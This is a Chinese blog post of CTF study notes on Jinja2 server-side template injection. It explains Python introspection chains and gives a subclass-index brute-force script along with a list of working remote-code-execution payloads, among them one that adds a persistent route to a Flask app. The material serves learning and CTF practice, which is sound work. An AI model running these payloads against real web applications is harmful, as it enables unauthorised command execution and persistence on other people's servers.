SSTI模板注入个人解读

最新推荐文章于 2024-09-16 19:09:48 发布
最新推荐文章于 2024-09-16 19:09:48 发布
阅读量461 收藏 10
点赞数 8
分类专栏: CTF 文章标签: android 开发语言 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/The_Epiphany/article/details/137088713
版权

模板框架:
    python:jinja2 mako tornado django
    PHP:smarty twig
    java:jade velocity
        等等

# Python模板注入
    Jinja2模板为例子,源于hello-ctf.com

<font color="#d99694"><u>明确知识点:</u></font>
- 对象:在Python中万物皆对象,[]、""、{}等都是不同类型的对象
- 继承:我们知道对象是类的实例,类是对象的模板。在我们创建一个对象时就对一个类进行了实例化,而所有的类都继承于一个基类<font color="#ffff00">object</font>。<font color="#00b0f0">值得注意的是如果定义类时没有指定继承,那么其默认继承自<font color="#ffff00">object</font></font>。
- 魔术方法:于是乎如果我们就可以有这样一个想法,<font color="#ffff00">子->object->子</font>,这样我们就能访问我们本无法访问的函数等等,这一过程中所用到的函数就是魔术方法,<font color="#ffff00">例如__class__</font>。

好了,那么我们的思路就很明确了,那就是<font color="#ffff00">创建对象->拿基类->找子类->构造命令或执行文件</font>。

## 拿基类
在该处我们有一些常用的魔术方法如下
````python
__class__     类的一个内置属性,表示实例对象的类。
__base__      类型对象的直接基类
__bases__     类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__       查看继承关系和调用顺序,返回元组。此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
````

```python
>>>"".__class__
<class 'str' >
>>>"".__class__.__base__  我们创建了""并返回直接其类,根据理论可猜测其输出应是object类
<class 'object' >
```
同理除了字符串/列表/字典/元组,已有模块例如request也可拿到基类,只不过过程稍微复杂。
当然如果不想弄清其中的逻辑,<u>我们也可以用索引的方法偷懒</u>。
```python
>>>"".__class__.base
>>>"".__class__.bases[0]
>>>request.__class__.bases[-1]  #也可以通过多次__base__实现
>>>"".__class__.more[-1]
他们最终的效果是等价的,返回object类
```

## 找子类
用__subclasses__()可以获取所有子类,<font color="#f79646">返回列表[]</font>。
![[image-20231129164759866 1.png]]
```python
"".__class__.base.__subclasses__() [num].__init__.__globals__
通过subclasses()[num]索引进入所需子类,
__init__    初始化类,返回function
__globals__ 用法 函数名.__globals__获取函数空间下所有可用的module、方法和变量
也就是说我们通过以上操作进入了子类内,接着可以实现各种调用
__builtins__ 简单来讲就是实现一些内置函数调用,用于__globals__无法直接调用的情况,比如说eval函数
```
当然手动查找num不高效,贴代码。


```python
url = ""
def find_eval(url):
    for i in range(500):
        data = {
            'code': "{{().__class__.__bases__[0].__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']}}",
        }
        res = requests.post(url, data=data, headers=headers)
        if 'eval' in res.text:#要用到的命令
            print(data)

if __name__ == "main":
    find_eval(url)
```

## 命令执行
```python
# eval
x[NUM].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()')

# os.py
x[NUM].__init__.__globals__['os'].popen('ls /').read()

# popen
x[NUM].__init__.__globals__['popen']('ls /').read()

# _frozen_importlib.BuiltinImporter
x[NUM]["load_module"]("os")["popen"]("ls /").read()

# linecache
x[NUM].__init__.__globals__['linecache']['os'].popen('ls /').read()

# subprocess.Popen
x[NUM]('ls /',shell=True,stdout=-1).communicate()[0].strip()
```

## 其他RCE
```python
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

{{g.pop.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{url_for.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{lipsum.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{get_flashed_messages.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{application.__init__.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{self.__init__.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{cycler.__init__.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{joiner.__init__.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{namespace.__init__.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

{{url_for.__globals__.current_app.add_url_rule('/1333337',view_func=url_for.__globals__.__builtins__['__import__']('os').popen('ls').read)}}
```


## 总结
<font color="#f79646">说到底SSTI注入,就是一条链的寻找,是一个由子到父再到子的过程,payload也只是构造内容上的细微区别。</font>
    PS:师傅们说实战中几乎不存在这种漏洞,大哭
![[image-20231128173610525.png]]

The_Epiphany
关注
专栏目录
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1667
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
浅学Go下的ssti
YJ_12340的博客
05-09 1266
template之所以称作为模板的原因就是其由静态内容和动态内容所组成,可以根据动态内容的变化而生成不同的内容信息交由客户端,以下即一个简单例子模板内容 Hello, {{.Name}} Welcome to go web programming…期待输出 Hello, liumiaocn Welcome to go web programming…
ISCTF2023 部分wp
arcuied
11-29 1372
学一年了还在入门(
基于SSTI的木马远控编写
willing-sir的博客
01-01 222
基于SSTI的木马远控编写 起因是要交实习作业,编写渗透测试平台,我觉得没有页面展示的平台算什么平台,于是乎写了个python flask+jinja2的web页面,但是在写后门远控这一块的时候,遇到了很多问题,没有办法把socket和web端结合起来,因为每次访问触发函数就会导致重复启用socket服务,造成端口冲突,指令也无法传递。当然,并不是说这种方式不可以,flask有其专门的webso...
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5598
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
SSTI模板注入
热门推荐
0verWatch的博客
02-08 1万+
先入个门 Jimja2 Jinja2是默认的仿Django模板的一个模板引擎,由Flask的作者开发。网上搜的语法2333,方便自己回顾 模板 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ... #}:装载一个注释,模板渲染的时候会忽视这中间的值 变量 在模板中添加变量,可以使用(set)语句。 ...
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 919
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
CTF SSTI模板注入详解
weixin_47696216的博客
03-31 5692
“百度杯”CTF比赛 十一月场 Web题:Fuzz python SSTI模板注入
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3666
web安全-SSTI模板注入漏洞
【兼容性记录】video标签在 IOS 和 安卓中的问题
fans_x的博客
09-13 847
业务需求背景:由于业务中涉及到有视频播放的内容,所以就使用了video标签去做,但是video标签在ios 设备和安卓设备中的默认行为不一致,故记录下解决方法(折中办法)。
Android 内置应用裁剪
Framework-coder的博客
09-13 119
参考 AOSP 中 PRODUCT_PACKAGES 配置的方式,自定义一个“PRODUCT_PACKAGES_REMOVE”配 置选项。用户可根据自身项目的需要,将需裁剪的 APK 名称(无需 .apk 后缀) 都添加到“PRODUCT_PACKAGES_REMOVE”项下,从而做到一次性全部裁剪。此方法省去了查找目标 APK 的编译.mk 文件的时间,提高了工作效率。补丁如下:从以上补丁可以发现,只要是添加在“PRODUCT_PACKAGES_REMOVE”配置项下的 APK 都将被裁剪。
android 14.0 USB连接模式默认设为MTP
安卓兼职framework和app工程师的博客
09-13 327
在14.0android系统产品开发中,在通过otg连接设备的时候,会弹出usb连接模式这时候会让客户选择当前连接电脑是 哪种模式,在项目开发中,需要以mtp模式,就是可以在电脑查看设备的内部存储的样式来设置otg连接电脑的模式, 接下来分析下相关模式,来具体实现相关功能
Android14 蓝牙 BluetoothService 启动和相关代码介绍
wenzhi的博客
09-14 1612
蓝牙开关和使能开发主要用到:BluetoothService、BluetoothManagerService、BluetoothManager、BluetoothAdapter 这几个系统相关类。某个蓝牙的配对、连接、断开 使用的是 BluetoothDevice 对象。蓝牙开关状态不记忆或者打开异常就可以看看BluetoothManagerService的日志,里面有打开关闭相关过程日志和时间点,这个对问题分析有一定的帮助。本文主要介绍一下 framework 相关的几个类,
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 722
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
Android MediaPlayer + GLSurfaceView 播放视频
最新发布
ansondroider的博客
09-16 1117
Android开发中,使用OpenGL ES来渲染视频是一种常见的需求,尤其是在需要实现自定义的视频播放界面或者视频特效时。结合MediaPlayer,我们可以实现一个功能强大的视频播放器。以下是一个简单的示例,展示如何在Android应用中使用OpenGL ES和MediaPlayer播放本地视频。
php 实现JWT
Crazy_shark的博客
09-11 688
在 PHP 中,JSON Web Token (JWT) 是一种开放标准 (RFC 7519) 用于在各方之间作为 JSON 对象安全地传输信息。JWT 通常用于身份验证系统,如 OAuth2 或基于令牌的身份验证。以下是一个基本的 PHP 实现 JWT 生成和验证的代码示例。
Android 11 FileProvider的使用和限制
qq_34629725的博客
09-12 585
Android 7开始,将不允许在app之间,使用file uri,即file://的方式,传递一个file,否则会抛出异常:FileUriExposedException ,其解决方案,就是使用FileProvider,用content://代替file://,同时需要将targetSdk,升级到24。主要用于系统相机拍照及图片裁剪、应用之间数据访问、应用的升级等。
Android 如何实现搜索功能:本地搜索?数据模型如何设计?数据如何展示和保存?
qq_40853919的博客
09-16 582
其实搜索功能的重点在于数据模型的设计,还有apdater布局的设置。以前都是一个一个控件的增加,数据也可以直接就增加,所以维护很模仿,现在换成了recycleview,所以我们需要思考每一个item,他的数据应该如何展示,默认值是如何,在哪个分类,如何保存数据。
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面返回给浏览器。在SSTI攻击中,恶意注入的有效载荷可以是任意的模板代码,其目的是执行非法操作或者获取敏感信息。 关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令,例如使用`${{7*7}}`来执行简单的算术运算。 2. 通过访问对象的属性和方法来获取敏感信息,例如`{{config.items()}}`来获取应用程序的配置信息。 3. 利用模板语法实现循环、条件语句等控制流程,例如使用`{% for i in range(10) %}...{% endfor %}`来进行循环操作。 4. 调用模板引擎提供的特殊函数和过滤器,例如使用`{{7|safe}}`来禁用自动转义,或者使用`{{user.name|escape}}`来对用户输入进行转义。 请注意,在实际应用中进行SSTI攻击是非法的行为,我强烈建议您不要尝试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值